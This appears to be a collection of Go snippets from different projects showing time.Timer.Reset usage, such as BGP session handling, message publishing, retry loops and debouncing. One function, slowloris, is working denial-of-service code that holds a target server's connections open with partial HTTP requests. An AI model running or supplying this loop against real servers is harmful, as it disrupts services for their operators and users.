func main() { broker := NewBroker() port, err := strconv.Atoi(os.Args[1]) if err != nil { fmt.Println(err.Error()) os.Exit(1) } if len(os.Args) > 2 { registryURL := os.Args[2] myURL := os.Args[3] err := announceBroker(registryURL, myURL) if err != nil { fmt.Println(err.Error()) os.Exit(1) } var timer *time.Timer timer = time.AfterFunc(RegistryAnnouncePeriod, func() { err := announceBroker(registryURL, myURL) if err != nil { fmt.Println("Error reannouncing to broker!") } timer.Reset(RegistryAnnouncePeriod) }) } http.Handle("/", broker) http.ListenAndServe(fmt.Sprintf(":%d", port), nil) }
// established runs the ESTABLISHED state of the BGP FSM: it starts the
// send/receive message loops and then services events until the session
// ends, returning the next FSM state.
func (h *FSMHandler) established() bgp.FSMState {
	fsm := h.fsm
	h.conn = fsm.conn
	h.t.Go(h.sendMessageloop)
	h.msgCh = h.incoming
	h.t.Go(h.recvMessageloop)
	// A negotiated hold time of zero disables the hold timer: a zero
	// time.Timer has a nil channel, so its select case below never fires.
	var holdTimer *time.Timer
	if fsm.negotiatedHoldTime == 0 {
		holdTimer = &time.Timer{}
	} else {
		holdTimer = time.NewTimer(time.Second * time.Duration(fsm.negotiatedHoldTime))
	}
	for {
		select {
		case <-h.t.Dying():
			// The tomb is shutting the handler down.
			return 0
		case conn, ok := <-fsm.connCh:
			if !ok {
				// NOTE(review): this break only leaves the select, not the
				// for loop — presumably intentional, but confirm.
				break
			}
			// Only one connection per peer: drop extra accepted ones.
			conn.Close()
			log.WithFields(log.Fields{
				"Topic": "Peer",
				"Key":   fsm.peerConfig.NeighborAddress,
			}).Warn("Closed an accepted connection")
		case <-h.errorCh:
			// A message loop reported a failure; tear the session down.
			h.conn.Close()
			h.t.Kill(nil)
			h.reason = "Peer closed the session"
			return bgp.BGP_FSM_IDLE
		case <-holdTimer.C:
			// Nothing heard from the peer within the hold time: notify it
			// and drop to IDLE.
			log.WithFields(log.Fields{
				"Topic": "Peer",
				"Key":   fsm.peerConfig.NeighborAddress,
				"data":  bgp.BGP_FSM_ESTABLISHED,
			}).Warn("hold timer expired")
			m := bgp.NewBGPNotificationMessage(bgp.BGP_ERROR_HOLD_TIMER_EXPIRED, 0, nil)
			h.outgoing <- m
			h.reason = "HoldTimer expired"
			return bgp.BGP_FSM_IDLE
		case <-h.holdTimerResetCh:
			// A message arrived; push the hold deadline out again.
			if fsm.negotiatedHoldTime != 0 {
				holdTimer.Reset(time.Second * time.Duration(fsm.negotiatedHoldTime))
			}
		case s := <-fsm.adminStateCh:
			err := h.changeAdminState(s)
			if err == nil {
				switch s {
				case ADMIN_STATE_DOWN:
					// Administrative shutdown: tell the peer we ceased.
					m := bgp.NewBGPNotificationMessage(
						bgp.BGP_ERROR_CEASE, bgp.BGP_ERROR_SUB_ADMINISTRATIVE_SHUTDOWN, nil)
					h.outgoing <- m
				}
			}
		}
	}
	// Unreachable: the loop above only exits via return.
	return 0
}
// timedDecoder returns a Decorated decoder that generates the given error if no events
// are decoded for some number of sequential timeouts. The returned Decoder is not safe
// to share across goroutines. A single timer is lazily allocated on the first call and
// re-armed (Reset) on each subsequent one.
// TODO(jdef) this probably isn't the right place for all of this logic (and it's not
// just monitoring the heartbeat messages, it's counting all of them..). Heartbeat monitoring
// has specific requirements. Get rid of this and implement something better elsewhere.
func timedDecoder(dec records.Decoder, dur time.Duration, timeouts int, err error) records.Decoder {
	var t *time.Timer
	return records.DecoderFunc(func(v interface{}) error {
		if t == nil {
			t = time.NewTimer(dur)
		} else {
			t.Reset(dur)
		}
		defer t.Stop()
		// Buffered so the decode goroutine can complete even if nobody
		// is left receiving.
		errCh := make(chan error, 1)
		go func() {
			// there's no way to abort this so someone else will have
			// to make sure that it dies (and it should if the response
			// body is closed)
			errCh <- dec.Decode(v)
		}()
		// NOTE(review): the timer is never re-armed inside this loop, so
		// iterations after the first expiry only wait on errCh — confirm
		// whether multiple sequential timeouts were meant to re-arm t.
		for x := 0; x < timeouts; x++ {
			select {
			case <-t.C:
				// check for a tie
				select {
				case e := <-errCh:
					return e
				default:
					// noop, continue
				}
			case e := <-errCh:
				return e
			}
		}
		// All timeouts elapsed with no decoded event.
		return err
	})
}
// execute some action in the context of the current process. Actions
// executed via this func are to be executed in a concurrency-safe manner:
// no two actions should execute at the same time. invocations of this func
// should not block for very long, unless the action backlog is full or the
// process is terminating.
// returns errProcessTerminated if the process already ended.
func (self *procImpl) doLater(deferredAction Action) (err <-chan error) {
	// Wrap the action so the process wait-group tracks its execution.
	a := Action(func() {
		self.wg.Add(1)
		defer self.wg.Done()
		deferredAction()
	})
	scheduled := false
	self.writeLock.Lock()
	defer self.writeLock.Unlock()
	// Lazily-created fallback timer: it broadcasts on the condition so
	// the Wait below cannot sleep past maxRescheduleWait even if no
	// genuine state change is signalled.
	var timer *time.Timer
	for err == nil && !scheduled {
		switch s := self.state.get(); s {
		case stateRunning:
			select {
			case self.backlog <- a:
				scheduled = true
			default:
				// Backlog full: wait for a change broadcast, with the
				// timer as a wake-up so we re-check the state.
				if timer == nil {
					timer = time.AfterFunc(self.maxRescheduleWait, self.changed.Broadcast)
				} else {
					timer.Reset(self.maxRescheduleWait)
				}
				self.changed.Wait()
				timer.Stop()
			}
		case stateTerminal:
			err = ErrorChan(errProcessTerminated)
		default:
			err = ErrorChan(errIllegalState)
		}
	}
	return
}
// internalPubAsync queues a publish of msgBody on the topic and waits for the
// topic worker to complete it. clientTimer bounds how long we wait for the
// topic to accept the request (5 seconds): a nil clientTimer allocates a
// fresh one, otherwise the caller's timer is re-armed and reused.
func internalPubAsync(clientTimer *time.Timer, msgBody *bytes.Buffer, topic *nsqd.Topic) error {
	if topic.Exiting() {
		return nsqd.ErrExiting
	}
	info := &nsqd.PubInfo{
		Done:     make(chan struct{}),
		MsgBody:  msgBody,
		StartPub: time.Now(),
	}
	if clientTimer == nil {
		clientTimer = time.NewTimer(time.Second * 5)
	} else {
		clientTimer.Reset(time.Second * 5)
	}
	// Fast path: non-blocking hand-off to the topic's wait channel.
	select {
	case topic.GetWaitChan() <- info:
	default:
		// Slow path: block until accepted, the topic quits, or the
		// 5-second timer expires.
		select {
		case topic.GetWaitChan() <- info:
		case <-topic.QuitChan():
			nsqd.NsqLogger().Infof("topic %v put messages failed at exiting", topic.GetFullName())
			return nsqd.ErrExiting
		case <-clientTimer.C:
			nsqd.NsqLogger().Infof("topic %v put messages timeout ", topic.GetFullName())
			return ErrPubToWaitTimeout
		}
	}
	// Wait for the topic worker to finish handling the request.
	<-info.Done
	return info.Err
}
func appMain(driver gxui.Driver) { theme := dark.CreateTheme(driver) label := theme.CreateLabel() label.SetText("This is a progress bar:") progressBar := theme.CreateProgressBar() progressBar.SetDesiredSize(math.Size{W: 400, H: 20}) progressBar.SetTarget(100) layout := theme.CreateLinearLayout() layout.AddChild(label) layout.AddChild(progressBar) layout.SetHorizontalAlignment(gxui.AlignCenter) window := theme.CreateWindow(800, 600, "Progress bar") window.SetScale(flags.DefaultScaleFactor) window.AddChild(layout) window.OnClose(driver.Terminate) progress := 0 pause := time.Millisecond * 500 var timer *time.Timer timer = time.AfterFunc(pause, func() { driver.Call(func() { progress = (progress + 3) % progressBar.Target() progressBar.SetProgress(progress) timer.Reset(pause) }) }) }
// timerLoop loops indefinitely to query the given API, until "wait" times // out, using the "tick" timer to delay the API queries. It writes the // result to the given output. func timerLoop(api APIClient, requestedId string, wait, tick *time.Timer) (params.ActionResult, error) { var ( result params.ActionResult err error ) // Loop over results until we get "failed" or "completed". Wait for // timer, and reset it each time. for { result, err = fetchResult(api, requestedId) if err != nil { return result, err } // Whether or not we're waiting for a result, if a completed // result arrives, we're done. switch result.Status { case params.ActionRunning, params.ActionPending: default: return result, nil } // Block until a tick happens, or the timeout arrives. select { case _ = <-wait.C: return result, nil case _ = <-tick.C: tick.Reset(2 * time.Second) } } }
func (s *Scheme) runReader(reader factory.Reader, timer *time.Timer) { if s.warmupMessagesPerRun > 0 { logs.Logger.Info("Reading %d warmup messages", s.warmupMessagesPerRun) } var startTime, lastMessageTime time.Time buffer := make([]byte, s.bytesPerMessage*2) for i := 0; i < s.warmupMessagesPerRun; i++ { reader.Read(buffer) } logs.Logger.Info("Starting reading %d messages...", s.messagesPerRun) for { count, err := reader.Read(buffer) if err == io.EOF { break } lastMessageTime = time.Now() if startTime.IsZero() { startTime = lastMessageTime } timer.Reset(s.waitForLastMessage) s.countMessage(count, err) } logs.Logger.Info("Finished.") s.runTime = lastMessageTime.Sub(startTime) }
func (s *Ssdp) advertiseTimer(ads *AdvertisableServer, d time.Duration, age int) *time.Timer { var timer *time.Timer timer = time.AfterFunc(d, func() { s.advertiseServer(ads, true) timer.Reset(d + time.Duration(age)*time.Second) }) return timer }
func initTimer(t *time.Timer, timeout time.Duration) *time.Timer { if t == nil { return time.NewTimer(timeout) } if t.Reset(timeout) { panic("BUG: active timer trapped into initTimer()") } return t }
func setTimer(timer *time.Timer, d time.Duration) *time.Timer { if timer == nil { return time.NewTimer(d) } timer.Reset(d) return timer }
func main() { start := time.Now() var t *time.Timer t = time.AfterFunc(randomDuration(), func() { fmt.Println(time.Now().Sub(start)) t.Reset(randomDuration()) }) time.Sleep(5 * time.Second) }
// run is the agent's main loop: on every ticker cycle it tries to send
// buffered metrics, falling back to a one-minute retry timer when the
// send fails with a retryable error. ops delivers control functions;
// the loop exits when ops is closed or an op reports errShuttingDown.
func (a *Agent) run(ops <-chan opFunc) {
	// retry stays nil (an inert select case) until the first retryable
	// failure lazily creates the timer.
	var timer *time.Timer
	var retry <-chan time.Time
	retryNeeded := false
	a.ticker = time.NewTicker(a.Cycle)
	defer a.ticker.Stop()
	// trySend attempts one send; on a retryable failure it (re)arms the
	// shared retry timer, otherwise it records success or the error.
	trySend := func(from time.Time) {
		if err := a.sendRequest(from); err == nil {
			retryNeeded = false
			a.lastPoll = from
			a.clear()
		} else if iserr(err, errMustRetry) {
			if timer == nil {
				timer = time.NewTimer(time.Minute)
				retry = timer.C
			} else {
				timer.Reset(time.Minute)
			}
			retryNeeded = true
		} else {
			a.err = err
		}
	}
	for {
		select {
		case from := <-retry:
			trySend(from)
		case from := <-a.ticker.C:
			if a.LogMetrics {
				a.logMetrics()
			}
			if !retryNeeded {
				// Let the retry loop take over until things are back to normal.
				trySend(from)
			}
		case op, ok := <-ops:
			if !ok {
				return
			} else if op == nil {
				// This should be impossible. If it happens, log it and skip the op.
				fmt.Fprintln(a.Log, ErrNilOpReceived)
				continue
			}
			if err := op(a); iserr(err, errShuttingDown) {
				return
			} else if err != nil {
				a.err = err
			}
		}
	}
}
// Handler is the motion-sensor nog handler: it emits "motion detected"
// when the GPIO interrupt fires and "motion detected timeout" once 60s
// pass without further motion. Incoming "statechanged" messages refresh
// the handler state; closing `in` (or a missing sensor) stops the
// handler, which announces "stopped" and closes `out`.
func Handler(in <-chan nog.Message, out chan<- nog.Message) {
	out <- nog.Message{What: "started"}
	s := &Motion{}
	go func() {
		out <- nog.Template("motion")
	}()
	// motionTimer is nil until the first motion event; motionTimeout
	// stays nil (an inert select case) until the timer exists.
	var motionTimer *time.Timer
	var motionTimeout <-chan time.Time
	if c, err := gpio.GPIOInterrupt(7); err == nil {
		s.motionChannel = c
	} else {
		log.Println("Warning: Motion sensor off:", err)
		out <- nog.Message{What: "no motion sensor found"}
		goto done
	}
	for {
		select {
		case m, ok := <-in:
			if !ok {
				goto done
			}
			if m.Why == "statechanged" {
				// Refresh our state from the serialized message payload.
				dec := json.NewDecoder(strings.NewReader(m.What))
				if err := dec.Decode(s); err != nil {
					log.Println("motion decode err:", err)
				}
			}
		case motion := <-s.motionChannel:
			if motion {
				out <- nog.Message{What: "motion detected"}
				const duration = 60 * time.Second
				if motionTimer == nil {
					s.Motion = true
					motionTimer = time.NewTimer(duration)
					motionTimeout = motionTimer.C // enable motionTimeout case
				} else {
					// Motion while the window is open: extend the deadline.
					motionTimer.Reset(duration)
				}
			}
		case <-motionTimeout:
			// 60s without motion: report the timeout and disarm.
			s.Motion = false
			motionTimer = nil
			motionTimeout = nil
			out <- nog.Message{What: "motion detected timeout"}
		}
	}
done:
	out <- nog.Message{What: "stopped"}
	close(out)
}
// slowloris runs a slowloris-style attack: it opens a connection, sends
// a partial HTTP request, then keeps the connection alive by dribbling
// one header line every opts.interval seconds. On any write error the
// connection is re-opened. When opts.finishAfter > 0 a finish timer
// completes the request, reads the response and restarts the cycle.
func slowloris(opts options) {
	var conn net.Conn
	var err error
	// timerChan stays nil (an inert select case) when finishAfter <= 0.
	var timerChan <-chan time.Time
	var timer *time.Timer
	if opts.finishAfter > 0 {
		timer = time.NewTimer(time.Duration(opts.finishAfter) * time.Second)
		timerChan = timer.C
	}
loop:
	for {
		// Drop the previous connection (if any) before opening a new one.
		if conn != nil {
			conn.Close()
		}
		conn, err = openConnection(opts)
		if err != nil {
			continue
		}
		if _, err = fmt.Fprintf(conn, "%s %s HTTP/1.1\r\n", opts.method, opts.resource); err != nil {
			continue
		}
		header := createHeader(opts.target)
		if err = header.Write(conn); err != nil {
			continue
		}
		for {
			select {
			case <-time.After(time.Duration(opts.interval) * time.Second):
				// NOTE(review): resetting the finish timer on every
				// interval pushes the finishAfter deadline out each time,
				// so the timerChan case below can only fire when
				// interval > finishAfter — confirm this is intended.
				if timer != nil {
					timer.Reset(time.Duration(opts.finishAfter) * time.Second)
				}
				if _, err := fmt.Fprintf(conn, "%s\r\n", opts.dosHeader); err != nil {
					continue loop
				}
			// if timerChan is nil (finishAfter =< 0) the case involving it will be omitted
			case <-timerChan:
				// Finish the request, consume the response, start over.
				fmt.Fprintf(conn, "\r\n")
				ioutil.ReadAll(conn) // omit return values
				conn.Close()
				continue loop
			}
		}
	}
}
func main() { start := time.Now() reset := make(chan bool) var t *time.Timer t = time.AfterFunc(randomDuration(), func() { fmt.Println(time.Now().Sub(start)) reset <- true }) for time.Since(start) < 5*time.Second { <-reset t.Reset(randomDuration()) } }
func main() { flag.Parse() config := buildConfig() logger := log.New(config.LogOutput, "", log.LstdFlags) node, err := onecache.Create(config) if err != nil { logger.Printf("[ERROR] onecache: could not create node: %v\n", err) os.Exit(1) } // Handle interupts. c := make(chan os.Signal, 1) signal.Notify(c, os.Interrupt) node.Start() if *join != "" { peerNodes := strings.Split(*join, ",") if err := node.Join(peerNodes); err != nil { logger.Printf("[ERROR] onecache: could not join peers %v: %v", peerNodes, err) node.Exit() return } } if *retry_join != "" { var retry *time.Timer retryNodes := strings.Split(*retry_join, ",") retry = time.AfterFunc(0, func() { if err := node.Join(retryNodes); err != nil { logger.Printf("[DEBUG] onecache: could not join peers %v: %v\n", retryNodes, err) logger.Printf("[DEBUG] onecache: retrying in %v", *retry_interval) retry.Reset(*retry_interval) } else { retry.Stop() } }) } if *pprofEnabled { go func() { logger.Println(http.ListenAndServe(fmt.Sprintf(":%d", *pprofPort), nil)) }() } // Exit the node upon an interupt. for range c { node.Exit() return } }
// reschedule resets the specified fetch timer to the next announce timeout. func (f *Fetcher) reschedule(fetch *time.Timer) { // Short circuit if no blocks are announced if len(f.announced) == 0 { return } // Otherwise find the earliest expiring announcement earliest := time.Now() for _, announces := range f.announced { if earliest.After(announces[0].time) { earliest = announces[0].time } } fetch.Reset(arriveTimeout - time.Since(earliest)) }
// rescheduleComplete resets the specified completion timer to the next fetch timeout. func (f *Fetcher) rescheduleComplete(complete *time.Timer) { // Short circuit if no headers are fetched if len(f.fetched) == 0 { return } // Otherwise find the earliest expiring announcement earliest := time.Now() for _, announces := range f.fetched { if earliest.After(announces[0].time) { earliest = announces[0].time } } complete.Reset(gatherSlack - time.Since(earliest)) }
func getFlushChan(t *time.Timer, flushDelay time.Duration) <-chan time.Time { if flushDelay <= 0 { return closedFlushChan } if !t.Stop() { // Exhaust expired timer's chan. select { case <-t.C: default: } } t.Reset(flushDelay) return t.C }
// Write attempts to flush the events to the downstream sink until it succeeds
// or the sink is closed.
func (rs *RetryingSink) Write(event Event) error {
	logger := logrus.WithField("event", event)
	// A single timer serves every retry iteration: allocated on the
	// first backoff, re-armed (Reset) on later ones, stopped on return.
	var timer *time.Timer
retry:
	// Bail out promptly if the sink was closed while we were looping.
	select {
	case <-rs.closed:
		return ErrSinkClosed
	default:
	}
	// Ask the strategy how long to back off before this attempt; zero
	// means write immediately.
	if backoff := rs.strategy.Proceed(event); backoff > 0 {
		if timer == nil {
			timer = time.NewTimer(backoff)
			defer timer.Stop()
		} else {
			timer.Reset(backoff)
		}
		select {
		case <-timer.C:
			goto retry
		case <-rs.closed:
			return ErrSinkClosed
		}
	}
	if err := rs.sink.Write(event); err != nil {
		if err == ErrSinkClosed {
			// terminal!
			return err
		}
		logger := logger.WithError(err) // shadow!!
		// The strategy decides whether to drop the event or keep retrying.
		if rs.strategy.Failure(event, err) {
			logger.Errorf("retryingsink: dropped event")
			return nil
		}
		logger.Errorf("retryingsink: error writing event, retrying")
		goto retry
	}
	rs.strategy.Success(event)
	return nil
}
func updateTimer(t *time.Timer, deadline time.Time) <-chan time.Time { if !t.Stop() { select { case <-t.C: default: } } if deadline.IsZero() { return nil } d := -time.Since(deadline) if d <= 0 { return closedDeadlineCh } t.Reset(d) return t.C }
func (c *connection) reader() { message := make([]byte, 1024) var timer *time.Timer if c.timeout > 0 { timer = time.NewTimer(c.timeout) } for { if c.timeout > 0 { // check if we've timed out select { case <-timer.C: return default: } } nr, err := c.ws.Read(message) if err != nil { break } if nr > 0 { rgb := strings.Split(string(message[:nr]), ",") for i := range color { c, err := strconv.Atoi(rgb[i]) if err != nil { color[i] = 0 } color[i] = byte(c) } if c.timeout > 0 { timer.Reset(c.timeout) } h.broadcast <- fmt.Sprintf("%d,%d,%d", color[0], color[1], color[2]) lightQueue <- color } } c.ws.Close() }
// sendEveryInterval forwards buffered events downstream: on a timer tick
// every `interval` (when interval > 0), or immediately when a manual
// flush arrives on w.flush. On ctx cancellation a final flush is done
// with a fresh background context (bounded by w.timeout, if set).
func (w *Proxy) sendEveryInterval(ctx context.Context, interval time.Duration) {
	defer func() {
		// Flush on close -- use a different context, though.
		ctx := context.Background()
		if timeout := w.timeout; timeout > 0 {
			var cancel context.CancelFunc
			ctx, cancel = context.WithTimeout(ctx, timeout)
			defer cancel()
		}
		w.swapAndSend(ctx, nil)
	}()
	// tick stays nil (an inert select case) when interval <= 0, leaving
	// only manual flushes.
	var tick <-chan time.Time
	var timer *time.Timer
	if interval > 0 {
		timer = time.NewTimer(interval)
		tick = timer.C
		defer timer.Stop()
	}
	done := ctx.Done()
	for {
		select {
		case <-done:
			// Dead
			return
		case <-tick:
			// Send after interval (ticker is nil if interval <= 0)
			w.swapAndSend(ctx, nil)
		case op := <-w.flush:
			// Send forced
			w.swapAndSend(op.ctx, op.err)
		}
		// Reset timer if we're using that and not just flushing manually.
		if timer != nil {
			timer.Reset(interval)
		}
	}
}
func debounce(ch chan zk.Event, delay time.Duration) chan zk.Event { debounced := make(chan zk.Event) var t time.Timer var latest zk.Event go func() { latest = <-ch logger.Println("Got event. Delaying post") t = *time.NewTimer(delay) for { select { case ev := <-ch: logger.Println("Got event. Delaying post") latest = ev t.Reset(delay) case _ = <-t.C: logger.Println("No further debouncing. Posting event") debounced <- latest } } }() return debounced }
// loop drives the DeferTime state machine. startC (re)arms a timer for
// dt.d, firing dt.f when it expires; stopC disarms it; closeC ends the
// loop. Stopped timers are drained so a stale tick can never fire f.
func (dt *DeferTime) loop() {
	var (
		timer *time.Timer = nil
		// c mirrors timer.C while armed; nil keeps its select case inert.
		c <-chan time.Time = nil
		// sawTimer records that we already received from timer.C, so the
		// drains below must not block on an already-empty channel.
		sawTimer = false
	)
	for {
		select {
		case <-c:
			sawTimer = true
			dt.f()
			timer, c = nil, nil
		case <-dt.stopC:
			if timer != nil && !timer.Stop() && !sawTimer {
				<-timer.C // drain previous timer since it was not triggered.
			}
			timer, c = nil, nil
		case <-dt.startC:
			if timer != nil {
				// Re-arm the existing timer, draining a pending tick
				// first so Reset starts from a clean channel.
				if !timer.Stop() {
					<-timer.C
				}
				timer.Reset(dt.d)
			} else {
				timer = time.NewTimer(dt.d)
			}
			c, sawTimer = timer.C, false
		case <-dt.closeC:
			if timer != nil && !timer.Stop() && !sawTimer {
				<-timer.C
			}
			return
		}
	}
}
// monitor is the connection's idle-timeout watchdog: a timer is
// (re)armed from setTimeoutChan and reset on every activity signal from
// resetChan; on expiry all streams are reset and the connection closed.
// Connection close tears the loop down and drains both channels so
// in-flight senders cannot block.
func (i *idleAwareFramer) monitor() {
	var (
		timer *time.Timer
		// expired mirrors timer.C once a timer exists; while nil its
		// select case is inert.
		expired        <-chan time.Time
		resetChan      = i.resetChan
		setTimeoutChan = i.setTimeoutChan
	)
Loop:
	for {
		select {
		case timeout := <-i.setTimeoutChan:
			i.timeout = timeout
			if timeout == 0 {
				// A zero timeout disables idle monitoring.
				if timer != nil {
					timer.Stop()
				}
			} else {
				if timer == nil {
					timer = time.NewTimer(timeout)
					expired = timer.C
				} else {
					timer.Reset(timeout)
				}
			}
		case <-resetChan:
			// Activity on the connection: push the idle deadline out.
			if timer != nil && i.timeout > 0 {
				timer.Reset(i.timeout)
			}
		case <-expired:
			// Idle too long: detach every stream, then reset them and
			// close the connection in a goroutine so the loop stays free.
			i.conn.streamCond.L.Lock()
			streams := i.conn.streams
			i.conn.streams = make(map[spdy.StreamId]*Stream)
			i.conn.streamCond.Broadcast()
			i.conn.streamCond.L.Unlock()
			go func() {
				for _, stream := range streams {
					stream.resetStream()
				}
				i.conn.Close()
			}()
		case <-i.conn.closeChan:
			if timer != nil {
				timer.Stop()
			}
			// Start a goroutine to drain resetChan. This is needed because we've seen
			// some unit tests with large numbers of goroutines get into a situation
			// where resetChan fills up, at least 1 call to Write() is still trying to
			// send to resetChan, the connection gets closed, and this case statement
			// attempts to grab the write lock that Write() already has, causing a
			// deadlock.
			//
			// See https://github.com/docker/spdystream/issues/49 for more details.
			go func() {
				for _ = range resetChan {
				}
			}()
			go func() {
				for _ = range setTimeoutChan {
				}
			}()
			i.writeLock.Lock()
			close(resetChan)
			i.resetChan = nil
			i.writeLock.Unlock()
			i.setTimeoutLock.Lock()
			close(i.setTimeoutChan)
			i.setTimeoutChan = nil
			i.setTimeoutLock.Unlock()
			break Loop
		}
	}
	// Drain resetChan
	for _ = range resetChan {
	}
}
// Runs in a separate goroutine, accepting incoming messages. Each pack
// is encoded and appended to a per-dimension split file (rotating the
// file when writeMessage says so); an optional flush timer rotates
// files by time every FlushInterval milliseconds. A closed input
// channel finalizes all files and shuts the receiver down.
func (o *S3SplitFileOutput) receiver(or OutputRunner, wg *sync.WaitGroup) {
	var (
		pack          *PipelinePack
		e             error
		timer         *time.Timer
		timerDuration time.Duration
		outBytes      []byte
	)
	ok := true
	inChan := or.InChan()
	timerDuration = time.Duration(o.FlushInterval) * time.Millisecond
	if o.FlushInterval > 0 {
		timer = time.NewTimer(timerDuration)
		if o.timerChan == nil { // Tests might have set this already.
			o.timerChan = timer.C
		}
	}
	// TODO: listen for SIGHUP and finalize all current files.
	// see file_output.go for an example
	for ok {
		select {
		case pack, ok = <-inChan:
			if !ok {
				// Closed inChan => we're shutting down, finalize data files
				o.finalizeAll()
				o.shuttingDown = true
				close(o.publishChan)
				// break leaves the select; the loop condition then exits.
				break
			}
			dimPath := o.getDimPath(pack)
			// fmt.Printf("Found a path: %s\n", dimPath)
			// Note: this ok (:=) shadows the loop-control ok above.
			fileInfo, ok := o.dimFiles[dimPath]
			if !ok {
				fileInfo = &SplitFileInfo{
					name:       filepath.Join(dimPath, o.getNewFilename()),
					lastUpdate: time.Now().UTC(),
					size:       0,
				}
				o.dimFiles[dimPath] = fileInfo
			}
			// Encode the message
			if outBytes, e = or.Encode(pack); e != nil {
				atomic.AddInt64(&o.encodeMessageFailures, 1)
				or.LogError(e)
			} else if outBytes != nil {
				// Write to split file
				doRotate, err := o.writeMessage(fileInfo, outBytes)
				if err != nil {
					or.LogError(fmt.Errorf("Error writing message to %s: %s", fileInfo.name, err))
				}
				if doRotate {
					// Remove current file from the map (which will trigger the
					// next record with this path to generate a new one)
					delete(o.dimFiles, dimPath)
					if e = o.finalizeOne(fileInfo); e != nil {
						or.LogError(fmt.Errorf("Error finalizing %s: %s", fileInfo.name, e))
					}
				}
			} // else the encoder did not emit a message.
			pack.Recycle(nil)
		case <-o.timerChan:
			// Flush interval elapsed: rotate files by time, then re-arm.
			if e = o.rotateFiles(); e != nil {
				or.LogError(fmt.Errorf("Error rotating files by time: %s", e))
			}
			timer.Reset(timerDuration)
		}
	}
	wg.Done()
}
// established runs the ESTABLISHED state of the BGP FSM: it starts the
// send/receive message loops and services events until the session
// ends, returning the next state together with the reason for leaving.
func (h *FSMHandler) established() (bgp.FSMState, FsmStateReason) {
	fsm := h.fsm
	h.conn = fsm.conn
	h.t.Go(h.sendMessageloop)
	h.msgCh = h.incoming
	h.t.Go(h.recvMessageloop)
	// A negotiated hold time of zero disables the hold timer: a zero
	// time.Timer has a nil channel, so its select case below never fires.
	var holdTimer *time.Timer
	if fsm.pConf.Timers.State.NegotiatedHoldTime == 0 {
		holdTimer = &time.Timer{}
	} else {
		holdTimer = time.NewTimer(time.Second * time.Duration(fsm.pConf.Timers.State.NegotiatedHoldTime))
	}
	fsm.gracefulRestartTimer.Stop()
	for {
		select {
		case <-h.t.Dying():
			return -1, FSM_DYING
		case conn, ok := <-fsm.connCh:
			if !ok {
				// NOTE(review): this break only leaves the select, not the
				// for loop — presumably intentional, but confirm.
				break
			}
			// Only one connection per peer: drop extra accepted ones.
			conn.Close()
			log.WithFields(log.Fields{
				"Topic": "Peer",
				"Key":   fsm.pConf.Config.NeighborAddress,
				"State": fsm.state.String(),
			}).Warn("Closed an accepted connection")
		case err := <-h.errorCh:
			h.conn.Close()
			h.t.Kill(nil)
			// On a read/write failure with graceful restart enabled,
			// report a graceful restart instead and arm the restart timer.
			if s := fsm.pConf.GracefulRestart.State; s.Enabled && (err == FSM_READ_FAILED || err == FSM_WRITE_FAILED) {
				err = FSM_GRACEFUL_RESTART
				log.WithFields(log.Fields{
					"Topic": "Peer",
					"Key":   fsm.pConf.Config.NeighborAddress,
					"State": fsm.state.String(),
				}).Info("peer graceful restart")
				fsm.gracefulRestartTimer.Reset(time.Duration(fsm.pConf.GracefulRestart.State.PeerRestartTime) * time.Second)
			}
			return bgp.BGP_FSM_IDLE, err
		case <-holdTimer.C:
			// Nothing heard from the peer within the hold time.
			log.WithFields(log.Fields{
				"Topic": "Peer",
				"Key":   fsm.pConf.Config.NeighborAddress,
				"State": fsm.state.String(),
			}).Warn("hold timer expired")
			m := bgp.NewBGPNotificationMessage(bgp.BGP_ERROR_HOLD_TIMER_EXPIRED, 0, nil)
			h.outgoing.In() <- &FsmOutgoingMsg{Notification: m}
			return bgp.BGP_FSM_IDLE, FSM_HOLD_TIMER_EXPIRED
		case <-h.holdTimerResetCh:
			// A message arrived; push the hold deadline out again.
			if fsm.pConf.Timers.State.NegotiatedHoldTime != 0 {
				holdTimer.Reset(time.Second * time.Duration(fsm.pConf.Timers.State.NegotiatedHoldTime))
			}
		case s := <-fsm.adminStateCh:
			err := h.changeAdminState(s)
			if err == nil {
				switch s {
				case ADMIN_STATE_DOWN:
					// Administrative shutdown: notify the peer we ceased.
					m := bgp.NewBGPNotificationMessage(bgp.BGP_ERROR_CEASE, bgp.BGP_ERROR_SUB_ADMINISTRATIVE_SHUTDOWN, nil)
					h.outgoing.In() <- &FsmOutgoingMsg{Notification: m}
				}
			}
		}
	}
}
// sendAnnouncement POSTs our current announcement (direct addresses and
// relay list) to the discovery server, then arms `timer` for the next
// attempt: the server-suggested Retry-After/Reannounce-After when given
// and valid, announceErrorRetryInterval on any failure, and
// defaultReannounceInterval on plain success.
func (c *globalClient) sendAnnouncement(timer *time.Timer) {
	var ann announcement
	if c.addrList != nil {
		ann.Direct = c.addrList.ExternalAddresses()
	}
	if c.relayStat != nil {
		// Include only relays whose status (latency) is known.
		for _, relay := range c.relayStat.Relays() {
			latency, ok := c.relayStat.RelayStatus(relay)
			if ok {
				ann.Relays = append(ann.Relays, Relay{
					URL:     relay,
					Latency: int32(latency / time.Millisecond),
				})
			}
		}
	}
	if len(ann.Direct)+len(ann.Relays) == 0 {
		// Nothing to announce; record the condition and retry later.
		c.setError(errors.New("nothing to announce"))
		if debug {
			l.Debugln("Nothing to announce")
		}
		timer.Reset(announceErrorRetryInterval)
		return
	}
	// The marshal doesn't fail, I promise.
	postData, _ := json.Marshal(ann)
	if debug {
		l.Debugf("Announcement: %s", postData)
	}
	resp, err := c.announceClient.Post(c.server, "application/json", bytes.NewReader(postData))
	if err != nil {
		if debug {
			l.Debugln("announce POST:", err)
		}
		c.setError(err)
		timer.Reset(announceErrorRetryInterval)
		return
	}
	if debug {
		l.Debugln("announce POST:", resp.Status)
	}
	resp.Body.Close()
	if resp.StatusCode < 200 || resp.StatusCode > 299 {
		if debug {
			l.Debugln("announce POST:", resp.Status)
		}
		c.setError(errors.New(resp.Status))
		if h := resp.Header.Get("Retry-After"); h != "" {
			// The server has a recommendation on when we should
			// retry. Follow it.
			if secs, err := strconv.Atoi(h); err == nil && secs > 0 {
				if debug {
					l.Debugln("announce Retry-After:", secs, err)
				}
				timer.Reset(time.Duration(secs) * time.Second)
				return
			}
		}
		timer.Reset(announceErrorRetryInterval)
		return
	}
	c.setError(nil)
	if h := resp.Header.Get("Reannounce-After"); h != "" {
		// The server has a recommendation on when we should
		// reannounce. Follow it.
		if secs, err := strconv.Atoi(h); err == nil && secs > 0 {
			if debug {
				l.Debugln("announce Reannounce-After:", secs, err)
			}
			timer.Reset(time.Duration(secs) * time.Second)
			return
		}
	}
	timer.Reset(defaultReannounceInterval)
}